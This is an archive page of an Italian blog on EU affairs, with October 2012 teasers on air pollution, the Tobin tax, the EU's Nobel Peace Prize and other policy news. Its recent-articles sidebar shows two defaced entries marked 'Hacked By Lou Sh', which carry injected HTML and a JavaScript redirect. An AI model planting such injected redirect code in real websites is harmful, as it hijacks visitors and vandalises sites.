EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Ottobre 2012
it

Ancora brutte notizie per l’Italia: dopo la bocciatura in quelle che sono state definite le Olimpiadi dell’immondizia – che ci hanno visto relegati al ventesimo posto – arriva anche la maglia nera per la qualità dell’aria. Secondo il rapporto pubblicato dall'Agenzia Ue per l’ambiente, infatti, in molti Paesi “le concentrazioni di sostanze inquinanti rimangono sopra i limiti legali stabiliti per proteggere la salute dei cittadini europei”. A condividere il fondo della classifica con l’Italia troviamo Polonia, Slovacchia, diverse zone dei Balcani, Bulgaria e Turchia.

È proprio il caso di dirlo: in Italia tira una brutta aria. E non ci riferiamo ai recenti scandali che hanno coinvolto le Regioni, o alla sentenza di condanna a 14 mesi di carcere per il giornalista Alessandro Sallusti – sentenza degna più di un regime totalitario che di una Repubblica democratica (...)

it

Nata a seguito dello scandalo Watergate e fondata dall’economista James Tobin, dal quale prende il nome, la tassa attacca le transizioni finanziare e si pone come obiettivo quello di garantire la stabilità valutaria internazionale. La Tobin Tax potrebbe presto diventare realtà. Si attende la decisione definitiva di alcuni dei Paesi membri. In modo particolare Italia e Spagna sembrano rappresentare l’ago della bilancia: la svolta è nelle loro mani.

La richiesta di Francia e Germania Moscovici e Schaeuble I Ministri delle Finanze di Francia e Germania hanno inviato una lettera alla Commissione europea chiedendo di adottare la tassa sulle transazioni finanziarie

it

Dal 2014 nascerà la Protezione Civile Europea: il progetto, nato da un’idea della Commissione Europea, intende far partire 10.000 volontari per dare aiuto nelle zone colpite da catastrofi ambientali e umanitarie.

L’iniziativa “Ue Aid Volunteers” si pone come obiettivo principale quello di aiutare le popolazioni colpite da qualsiasi tipo di catastrofe attraverso la collaborazione tra l’iniziativa della Commissione e le varie Ong. Le organizzazioni umanitarie infatti, necessitano sempre più di volontari ben (...)

it

Secondo i dati dell'Eurobarometro in materia di mobilità ferroviaria, la popolazione italiana è una delle più insoddisfatte d'Europa. Una percentuale simile è stata riscontrata solo in Romania (60%) e Bulgaria (58%).

Il servizio di trasporto su rotaie offerto dallo Stato italiano, secondo i dati forniti dalla Commissione e disponibili online sul sito ufficiale dell’Unione europea (www.europa.eu), non rispetta affatto le aspettative della gran parte dei suoi cittadini. L’80% degli italiani crede fermamente che (...)

it

Il regolamento (CE) n. 861/2007 del Parlamento europeo e del Consiglio applicabile dal 1 gennaio 2009 che istituisce un procedimento europeo per le controversie di modesta entità, mira a migliorare e semplificare le procedure nelle controversie civili e commerciali il cui valore non superi i 2.000 €.

Il regolamento è applicabile a tutti gli Stati membri dell’UE tranne la Danimarca; è a disposizione di tutti i cittadini parallelamente ai procedimenti previsti dalle normative degli Stati nazionali. Perché dunque viene spesso ignorato dai giudici? Perché non è conosciuto. Dalla relazione dei Cec (...)

it

“Sfruttare al meglio il potenziale della nuvola informatica in Europa”. È questo l’obiettivo dell’ultima iniziativa lanciata dalla Commissione europea e che mira alla creazione, entro il 2020, di 2,5 milioni di nuovi posti di lavoro e all’aumento dell’1% annuo del PIL europeo; un incremento, quindi, di circa 160 miliardi di euro.

Cos’è il Cloud Computing? Con l’espressione Cloud Computing, o nuvola informatica, si intende un insieme di tecnologie che permettono di memorizzare dati (file di testo, immagini, video…) e software, grazie all’utilizzo di risorse remote alle quali gli utenti possono accedere, in modo facile e (...)

it

Il contrassegno unificato per disabili europeo (CUDE), fa riferimento al nuovo codice della strada e riguarda le strutture, l’apposito attestato di invalidità e la segnaletica per facilitare gli spostamenti delle persone affette da disabilità. E’ rilasciato a persone invalide con capacità di deambulazione impedita o sensibilmente ridotta. Il pass avrà valore in tutta Italia e in tutti quegli Stati membri dell’UE che hanno già aderito al D.P.R n 151 del 15 settembre 2012.

Il nuovo contrassegno permetterà ai portatori di disabilità italiani ed europei di usufruire delle facilitazioni e delle agevolazioni di sosta previste per loro nei vari Stati dell’UE, senza che sia necessaria l’esibizione di altri documenti. Ma vediamo le caratteristiche tecniche del nuovo (...)

it

Maggiore impegno a livello nazionale ed europeo. Questa è la richiesta della Commissione, contenuta nella relazione presentata alla fine di settembre. Il miglioramento delle procedure di accoglienza di questi soggetti è auspicato anche dalla commissaria per gli Affari interni Cecilia Malmström.

Chi sono i minori non accompagnati Con questo termine vengono identificati i minori provenienti da paesi terzi o gli apolidi, che non raggiungono il diciottesimo anno d’età e che si inoltrano nel territorio europeo senza una persona adulta responsabile che li accompagni, o che qui vengono (...)

it

Si è aperta il 2 ottobre Tech Italy 2012, la convention sull’alta tecnologia italiana promossa dall’Ambasciata d’Italia a Bruxelles d’intesa con la vicepresidenza della Commissione europea e organizzata in collaborazione con l’Ice-Agenzia per la promozione all’estero e l’internazionalizzazione delle imprese italiane e con il ministero dell’Ambiente e della Tutela del Territorio e del Mare.

Sono stati tre giorni di confronto, dibattito e approfondimento, articolati in quattro sessioni: 1. L’Europa nello Spazio: il contributo italiano e le prospettive future 2. Tecnologie “verdi” per un’Europa Sostenibile 3. L’innovazione industriale al servizio della Salute 4. Patrimonio culturale e (...)

it

I test di resistenza destinati alle centrali nucleari furono introdotti dal Consiglio europeo in seguito all'incidente di Fukushima avvenuto nel marzo del 2011.

Obiettivo delle verifiche è stata la valutazione della sicurezza e della solidità degli impianti delle centrali nucleari europee, nel caso in cui si verificassero calamità naturali di notevole portata, in specie inondazioni e terremoti. E’ stata contemplata nei test anche la possibilità (...)

it

La risoluzione del PE riguarda l’istruzione, la formazione e la strategia Europa 2020. Consiste in un quadro strategico per la cooperazione europea nel settore dell’istruzione e della formazione, che prende le mosse dai progressi realizzati nel quadro del programma di lavoro “Istruzione e formazione 2010”.

L’11 settembre 2012 il Parlamento europeo ha approvato una risoluzione che evidenzia l’importanza dell’istruzione e invita le istituzioni UE e gli Stati membri ad agire. Essa istituisce degli obiettivi comuni per tutti gli Stati, incluso un certo numero di misure volte a raggiungere i risultati (...)

it

Si tratta naturalmente di una simulazione, potete dormire sonni tranquilli, i vostri conti sono al sicuro. L'iniziativa è stata presa affinchè si potessero osservare le reazioni degli esperti del settore, i quali devono tenersi pronti nell'eventualità di un attacco da parte degli hacker. I protagonisti, circa 400, hanno dovuto fronteggiare e risolvere circa 1200 attacchi simultanei ai propri server, caso estremo ma che potrebbe verificarsi a detta dei vertici dell'UE.

L’Agenzia europea per la sicurezza delle reti e dell’informazione ha voluto fortemente mettere alla prova gli esperti che si occupano della sicurezza dei nostri conti. Il mondo del web è in continua ed inarrestabile evoluzione, così un cyberattacco su scala continentale è un’ipotesi da non (...)

it

Nei giorni scorsi il vicepresidente della Commissione europea, Antonio Tajani, ha lanciato a Roma una campagna di informazione volta a garantire un rapido recepimento nelle legislazioni nazionali della direttiva 2011/7/UE relativa alla lotta contro i ritardi di pagamento nelle transazioni commerciali. Solo così sarà possibile salvaguardare le PMI europee dal rischio fallimento.

«Ogni anno migliaia di PMI falliscono nella vana attesa che le loro fatture siano pagate. Il nostro impegno è quello di combattere questo malcostume, che da tempo suscita la preoccupazione delle imprese. È necessario che gli Stati membri recepiscano al più presto la direttiva sui ritardi di (...)

it

I Paesi dell'Unione europea, strozzati dalla crisi economica, non sono in grado di finanziare il Fondo sociale europeo, che rende possibile l'attuazione di numerosi progetti, tra i quali spicca quello Erasmus. Il 23 ottobre verrà chiesto ai Paesi membri di ripianare il passivo del Fondo.

L’Unione europea ha reso noto di non avere a disposizione i fondi che avrebbero dovuto finanziare il progetto Erasmus. Colpa della crisi, che ancora una volta colpisce duramente il comparto universitario. Sebbene la Commissione bilancio del Parlamento europeo abbia ratificato gli emendamenti (...)

it

Un’opportunità per informare i cittadini più giovani e per capire insieme a loro la struttura politica ed economica in cui viviamo.

Il prontuario “A scuola d’Europa – Agenda per gli insegnanti”, redatto dal Dipartimento per le politiche europee, è rivolto ad insegnanti e studenti, dà la possibilità di ottenere informazioni utili a livello storico, geografico, politico ma non solo: permette anche di capire il funzionamento e la (...)

it

Il 5 ottobre 2012 è stata una giornata importante per tutti coloro che svolgono il mestiere del'insegnante. In questa giornata, infatti, già dal 1994 si celebra la Giornata mondiale dell'insegnante con l'obiettivo di ricordare l'importanza del ruolo del docente, da sempre punto di riferimento nelle istituzioni scolastiche per i ragazzi e per le loro famiglie. Quest'anno, però, il 5 ottobre è stato anche il giorno in cui sono stati diffusi i dati circa i continui tagli dei loro stipendi. La situazione sembra essere tutt'altro che confortante in tutta l'UE e nemmeno l'Italia presenta una situazione che possa essere definita positiva.

Giornata mondiale dell’insegnante Dal 1994 l’Unesco ha stabilito che il 5 ottobre fosse la giornata dedicata a una delle figure professionali che oggi si tende a trascurare: l’insegnante. Anche quest’anno, lo scorso 5 ottobre, è stata celebrata la Giornata mondiale dell’insegnante. L’obiettivo (...)

it

John Dalli, Commissario europeo per la salute e la politica dei consumatori, ha presentato nella giornata di ieri la rinuncia al suo incarico, ricevuta poi dal Presidente Barroso.

La strada delle dimissioni è stata scelta da Dalli in seguito alla notizia dell’apertura di un’inchiesta da parte dell’Ufficio europeo per la lotta anti-frode (Olaf), nella quale sarebbe coinvolto come indagato. La decisione dell’Olaf scaturisce dalla denuncia esposta lo scorso maggio dalla Swedish (...)

it

Il Parlamento europeo si concentra sulle lingue e ne sostiene l'apprendimento, è questo il risultato della risoluzione approvata dallo stesso organo dell’Unione. Istruzione prima della scuola,mobilità,cittadinanza attiva e l'intenzione di favorire i giovani nel mondo del lavoro sono i punti focali di questa importante risoluzione.

Il Parlamento europeo torna a sottolineare l’importanza delle lingue per l’inserimento e lo sviluppo dell’individuo singolo nel mondo del lavoro. Questo è quanto si è potuto capire attraverso l’approvazione della risoluzione dell’11 settembre 2012 che punta a sollecitare gli Stati membri ad una (...)

it

Negli scorsi giorni è stata presentata la relazione di allargamento del 2012, che pone i Paesi richiedenti sempre di più sotto la lente d’ingrandimento; la prossima tappa di avvicinamento dei Nove a Bruxelles si terrà a dicembre. L’obiettivo dell’Unione europea è di inglobare il maggior numero di Paesi europei per consolidare il ruolo del Vecchio continente nel tessuto internazionale.

E’ in continua evoluzione il lungo iter di allargamento dell’Unione europea. L’organo comunitario prosegue il processo di apertura dei propri confini nei confronti di numerosi Paesi che aspirano a sventolare la bandiera con le dodici stelle dorate su campo blu. L’obiettivo –dichiarato- di (...)

it

La possibilità di prestare assistenza finanziaria ai paesi terzi, il rafforzamento del ruolo del cittadino europeo e il riconoscimento dei suoi diritti attraverso l’istituzione di una Carta a lui interamente dedicata, l’avvio del progetto Europa 2020 volto a promuovere lo sviluppo dell’intero Paese, la lotta contro il terrorismo, la garanzia di assistenza in caso di calamità naturali e il potenziamento del potere del Parlamento: sono queste alcune delle ragioni che hanno portato l’Unione Europea a ricevere il Premio Nobel per la pace 2012.

I meriti dell’Unione europea Premio Nobel per la pace 2012 Nonostante il grave periodo di crisi di questi ultimi anni, il Comitato norvegese ha assegnato all’Unione europea il Premio Nobel per la pace 2012. Lo scorso 12 ottobre all’Unione europea è stato assegnato il Premio Nobel per la (...)

it

In questa settimana avranno luogo incontri ed iniziative per celebrare i numerosi traguardi del mercato unico e per discuterne il futuro sviluppo, la crescita e le opportunità che il Mercato Unico può dare ai cittadini europei. Per festeggiare questi 20 anni si è parlato anche di crescita economica e delle opportunità, impensabili per le generazioni precedenti.

Il mercato Unico Europeo è diventato attivo dal 1° Gennaio 1993 e comporta quattro libertà fondamentali: libera circolazione delle merci, dei servizi, delle persone e dei capitali; coesione economica; attuazione di politiche comuni volte all’armonizzazione delle normative nazionali. Il Mercato (...)

it

Nuove riforme per il 2013: ecco i propositi della Commissione per far ripartire l’innovativo progetto del “Cielo unico europeo”. L’iniziativa, che mira a regolamentare il settore del controllo dello spazio e del traffico aereo e della sicurezza, rappresenta una proposta interessante per rimodernare un contesto fermo alle regolamentazioni degli anni Sessanta.

L’iniziativa della Commissione europea nota con il nome di “Cielo unico europeo” (Single European Sky, SES) è tornata alla ribalta della cronaca dopo che il Commissario europeo ai trasporti, il Vicepresidente Siim Kallas, ha annunciato di voler presentare entro la primavera del 2013 nuove proposte (...)

it

Il sito di riferimento è www.medmem.eu, consultabile in tre differenti lingue: inglese, francese ed arabo. I documenti digitalizzati a disposizione del navigatore sono molteplici, si parla di circa 4000 file, la maggior parte resi disponibili dall'Ina, l'Istituto Nazionale dell'Audiovisivo francese. Anche l'Unione europea ha giocato un ruolo fondamentale, rendendosi pienamente disponibile e presentando anch'essa molti documenti interessanti.

Med-Mem nasce con uno scopo ben preciso: valorizzare e condividere (e per i meno esperti scoprire) il vasto patrimonio che il Mediterraneo ci ha lasciato e che continua a lasciarci ogni giorno. La nascita del sito sembra quanto mai opportuna, considerata l’importanza che questo mare riveste (...)

it

Sono stati resi noti durante la Fiera del Libro di Francoforte i nomi dei 12 autori emergenti vincitori dell’edizione 2012 del Premio europeo per la letteratura. A ciascuno di essi spetterà un assegno di 5.000 euro e la possibilità di ottenere i finanziamenti del programma Cultura dell'UE per tradurre la propria opera.

Di iniziative promosse dall’Ue a sostegno dei giovani europei ce ne sono molte, ma a meritare di essere ulteriormente approfondita, quest’oggi, è quella che attribuisce un riconoscimento ai migliori autori emergenti del vecchio continente: il Premio europeo per la letteratura, giunto ormai alla (...)

it

Presentata la proposta di introduzione delle quote rosa nei Consigli di Amministrazione europei, da parte della Commissaria europea per la Giustizia, i Diritti fondamentali e la Cittadinanza Viviane Reding.

La politica lussemburghese continua dunque a portare avanti il suo progetto: l’obiettivo finale è quello di vedere almeno il 40% dei posti di comando delle aziende europee quotate in borsa e delle società a partecipazione pubblica, ricoperti da donne. Ma le stesse colleghe della Reding (...)

it

Sono sempre di più i giovani che hanno abbandonato gli studi prima del tempo dovuto e che ad oggi sono disoccupati. Chi per negligenza, chi per mancanza di lavoro o per l’incapacità di autorealizzarsi, ognuno di loro oggi influenza in maniera negativa l’economia del nostro Paese. Coloro che hanno maggiori possibilità di rientrare in questa categoria sono tutti quei giovani con un basso livello di scolarizzazione: tra questi immigrati o ragazzi con problemi di salute.

La Generazione Neet Emmanuele Massagli Il vicepresidente dell’Adapt ci mostra quelli che fanno parte di questa categoria, facendo riferimento a coloro che, terminata la scuola, hanno iniziato a lavorare in nero. Neet è un acronimo inglese (Not in (...)

it

Dopo un mese di oscuramento, dal prossimo novembre riprenderà in Belgio la messa in onda delle trasmissioni di Rai2 e Rai3. Ascoltate le richieste avanzate dalla comunità italiana, che era scesa in piazza per protestare contro l'accaduto.

La Rai ha rinnovato la partnership con Belgacom. Pericolo scampato per la comunità italiana, che nei giorni scorsi aveva protestato per l’oscuramento di Rai2 e Rai3 nel Paese con capitale Bruxelles: tra pochi giorni essa potrà tornare a guardare le trasmissioni del Paese natìo. Gianni (...)

it

Nella riunione di ottobre del Comitato delle regioni UE viene espresso un parere positivo sul nuovo piano energetico che l’Unione propone per il rinnovamento delle energie. Riduzione delle emissioni e energie rinnovabili sono i punti cardine di questo nuovo progetto della Commissione.

Attraverso le parole del relatore e presidente del Comitato delle regioni dell’Unione Europea Cappellacci, il Comitato stesso sostiene la Road Map 2050 proposta dalla Commissione dell’Unione. Questo è il responso della riunione di Ottobre in cui non si è mancato di sottolineare anche il bisogno di (...)

it

È stato inaugurato il 19 ottobre scorso, a Bruxelles, il Global Recalls Portal (Portale globale dei richiami), un progetto nato dal lavoro congiunto tra l’Ue e i Paesi dell’OCSE, tra cui spiccano Canada, Stati Uniti e Australia. Il portale consentirà finalmente alle autorità internazionali di poter scambiare, in modo facile e veloce, le informazioni inerenti i prodotti non sicuri che sono stati ritirati dal mercato e di poterle condividere con i consumatori.

Uno dei temi che da sempre sta più a cuore all’Unione europea riguarda la sicurezza dei consumatori. Non a caso nel 2004 è stato creato il rapporto Rapex, sistema di informazione rapida che, fungendo da sistema di allarme comunitario, provvede a individuare e ritirare tempestivamente dal mercato (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France